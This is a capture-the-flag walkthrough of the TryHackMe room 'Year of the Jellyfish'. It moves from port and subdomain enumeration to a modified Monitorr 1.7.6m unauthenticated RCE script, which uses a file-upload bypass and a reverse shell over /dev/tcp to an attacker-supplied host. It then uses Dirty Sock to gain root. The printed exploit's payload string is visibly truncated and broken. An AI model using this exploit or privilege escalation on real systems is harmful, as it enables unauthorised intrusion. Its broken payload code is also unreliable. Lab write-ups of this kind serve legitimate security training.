# Year of the Jellyfish ## **SYNOPSIS** [Year of the Jellyfish ](https://tryhackme.com/room/yearofthejellyfish)is a hard box, based on the real-world challenge; giving a good practice for OSCP Preparation. Starting with Enumeration, helps us find subdomains, where using the Monitorr 1.7.6m RCE exploit leads us to foothold for the box, and ending with Privilege escalation using Dirty Sock version-2 exploit helps us to gain root access for the box. Also not forget to mention; this box is running on Public IP and also connected to [Tryhackme](https://tryhackme.com) Network. ## ENUMERATION **Starting with Nmap:** Scanning each port and then running another command to know more about services running on that particular ports. ``` nmap -p- -vv ``` ![Ports open on Machine-IP](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZW84URGroGfe-sKJcV%2F-MZW8tWXOrGaX22TDQuq%2Fimage.png?alt=media\&token=9f2385b7-f765-4174-a750-3e454d3167df) Now after getting this output running the following command to know more about services running on all the above ports. ``` nmap -sC -sV -p 21,22,80,443,554,1723,8000,8096,22222 ``` The output is very long, Instead of pasting the screenshot, writing the key points: * FTP running on Port 21 but no enough information to get in. * SSH is running on two ports: 22 & 22222. * Webserver Running on 4 ports: 80, 443, 8000 & 8096. * Looking closer to port 443 output; Shows the following subdomains: * *monitorr.robyns-petshop.thm* * *beta.robyns-petshop.thm* * *dev.robyns-petshop.thm* Now after getting the whole overview of what's happening on the network let's go deeper and start enumerating the Webservers. Before that adding the IP with domains and the subdomains in `/etc/hosts`this file. To know more about why to add all this check out this [article](https://www.cloudflare.com/en-gb/learning/dns/what-is-dns/). Now starting with **Root domain enumeration**: `robyns-petshop.thm`; You'll notice that it asks to accept the self-signed certificate and after doing so you will see the below front page. ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbg_6vPDUANj--YFQ4%2Fimage.png?alt=media\&token=0e045de0-24ed-49ed-bba4-a74f0aa1e8c8) It has not anything special; started with **ffuf** using the following command for brute-forcing directories and got the following results: ``` ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u https://robyns-petshop.thm/FUZZ ``` ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbirQLkJPzQDJ1p8Oz%2Fimage.png?alt=media\&token=05bb1d04-16b6-425f-a2fc-b81fb58cca79) Went through each and every one of them, found nothing special. Moving onto looking for what subdomains has to provide. The `beta.robyns-petshop.thm` & `dev.robyns-petshop.thm` had the same thing to show that the site is **Under Construction**. ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbk85qsBNUl68KowTZ%2Fimage.png?alt=media\&token=bfdaf498-5ed4-408d-9c10-d3aa9b57e28c) The *ID\_HERE thing looked fishy* so made a wordlist of numbers using **Crunch** with the following command to Bruteforce. ``` crunch 4 4 -t %%%% -o numb ``` This made a wordlist of numbers starting from: `0000-9999` . But again no luck with any information, Tried this on both subdomains - *Dev & beta.* Also before moving to the last subdomain there was another service running on port **8096** of the **root** **domain** named **Jellyfin** as you can see in the below image. This had a login portal, so fired up Hydra and started Bruteforcing the Credentials but no luck with that too. ![http://robyns-petshop.thm:8096](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZborl_Vd2cnie_QioU%2Fimage.png?alt=media\&token=e4feabe4-217e-4ad9-a6aa-b8fc5869c41b) Now we are left with our last sub-domain: `monitorr.robyns-petshop.thm` and this was looking interesting as it was **Open-Source** \[It had [GitHub Repo](https://github.com/monitorr/Monitorr)], **Version 1.7.6** was mentioned below down the page and had a **Login portal** too. For the login portal, *username: admin* was the default one, so again used Hydra to brute-force with admin username, but no luck. ![https://monitorr.robyns-petshop.thm](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbpU5tgmYNfDjmZpH7%2Fimage.png?alt=media\&token=7c0932b6-3477-4291-b83f-323fcd036d47) ![https://monitorr.robyns-petshop.thm/settings.php](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbq0fFDMVrUX9wW0-E%2Fimage.png?alt=media\&token=cd849c79-1db8-4b15-a856-b0f1512727f9) **Using Searchsploit** to identify if there's any exploit available for this monitorr version, and got the following results: ![Searchsploit Result](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbsXBN1tukk46NCY4o%2F-MZc5n804ArLME_xx_Gr%2Fimage.png?alt=media\&token=3ba24a00-7a80-4577-b25d-19f9aa0ee03c) ## INITIAL FOOTHOLD Looking into the first exploit here [Authorization Bypass](https://www.exploit-db.com/exploits/48981), "*allows creation of administrative accounts by abusing the installation URL*". This Exploit basically makes a post request to this path: `/assets/config/installation/_register.php?action=register` to create a new user. And while adding this path to the monitorr domain it gives a **404 Not Found**, Hence this exploit won't work! ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZkeLHPY9OPsSlGN4Fx%2F-MZkhmzAENSuMAmNmE9r%2Fimage.png?alt=media\&token=534e933c-daba-486d-b99c-da481d9bf8a2) Moving to the 2nd exploit [Remote Code Execution (Unauthenticated)](https://www.exploit-db.com/exploits/48980), I directly tried the exploit and it gave me errors and errors the main thing it showed was that the Certification Verification Failed, so searched on the internet and got to know that adding this to the code `verify=False` will ignore the verification thing and would move on with the code. ![Error](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZkeLHPY9OPsSlGN4Fx%2F-MZl0e4PWww41vrmEz49%2Fimage.png?alt=media\&token=1c63520a-f449-477f-8903-7a216cf8cbe8) Again tried with the exploit, it didn't worked. So if we see the code, that `requests.post` is sending post request to the server and in order to check the response, printed out the response. ``` print(requests.post(url, headers=headers, data=data, verify=False).text) ``` Now running the exploit again, getting the following error: ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlfSYcUC_IPRgE00sd%2F-MZlfdcvn-UYCTAeTLSR%2Fimage.png?alt=media\&token=6dff4f00-7212-42f7-ae59-194deee51815) After a while, got to know there's a cookie in the browser found via developer tools: **isHuman with value 1,** after that added the cookie in the code and ran the script, same error again; maybe there might be filter for uploading the files. Then messed up with file names, used [HackTricks Article](https://book.hacktricks.xyz/pentesting-web/file-upload) and finally got the file upload bypass: **shell.jpeg.Php** *And here's how the code is looking after doing all the changes to the main exploit:* ``` #!/usr/bin/python # -*- coding: UTF-8 -*- # Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) # Date: September 12, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ # Software Link: https://github.com/Monitorr/Monitorr # Version: 1.7.6m # Tested on: Ubuntu 19 import requests import os import sys if len (sys.argv) != 4: print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport") else: url = sys.argv[1] + "/assets/php/upload.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0","Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]} data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"shell.jpeg.Php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n" print(requests.post(url, headers=headers, data=data,verify=False,cookies={"isHuman":"1"}).text) print ("A shell script should be uploaded. Now we try to execute it") url = sys.argv[1] + "/assets/data/usrimg/shell.jpeg.Php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} requests.get(url, headers=headers,verify=False,cookies={"isHuman":"1"}) ``` Now before running the script, starting the nc listener at port 443 with sudo permissions. Why port 443? Because there might be firewall on other ports and I also tried with other ports it didn't worked. And *ports below **1024** needs **Sudo** permissions.* ![Got the reverse shell :)](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlfSYcUC_IPRgE00sd%2F-MZlrGUVtAUEVFIwhQ5u%2Fimage.png?alt=media\&token=4346a305-06df-4306-8507-fd157c488098) First thing to do after getting reverse shell is to stabilize the shell. Using the following commands: ``` python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Note: Now do Ctrl+Z stty raw -echo;fg ``` ### ***The First Flag: Is in the /var/www directory named as flag1.txt*** ## PRIVILEGE ESCALATION For Priv Esc, Started the [Linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) but it really didn't showed any good results, then used [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh), and it showed the following results: ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm-636FgQgtt0Ds-wv%2Fimage.png?alt=media\&token=e193082c-eaa1-4651-a1c0-72e9cb12335d) And now if we look at the snap version: it looks like it is vulnerable to Dirty Sock, let's download the [zip](https://github.com/initstring/dirty_sock/archive/master.zip) to local machine and wget it to compromised machine! ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm-cLToQeYAnbQ0nen%2Fimage.png?alt=media\&token=cf125ac5-2148-4aa1-b523-a1f645458973) Now it has 2 versions, tried the first one it gave error, and then tried the 2nd one and here's what I got: it created user dirty\_sock which has root permissions! Then switched **user to dirt\_sock** with the **password:dirty\_sock.** ![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm72UvfBckgIglocsL%2Fimage.png?alt=media\&token=02de0231-51a3-45c1-9dd4-2605c459d3ec) Then do **sudo su**; password as dirty\_sock, hence root! <3 ![Got the root :) ](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm8DNEbcJ3qm4-FzzX%2Fimage.png?alt=media\&token=84217fa3-d2e9-44f1-bd6e-962611162706) ### **Thank you for reading the Walk-Through, I hope it helped you somehow! :)** **If any queries or something, contact me here:** [Twitter](https://twitter.com/th3lazykid) **or on Discord**: **Th3lazykid#8871**.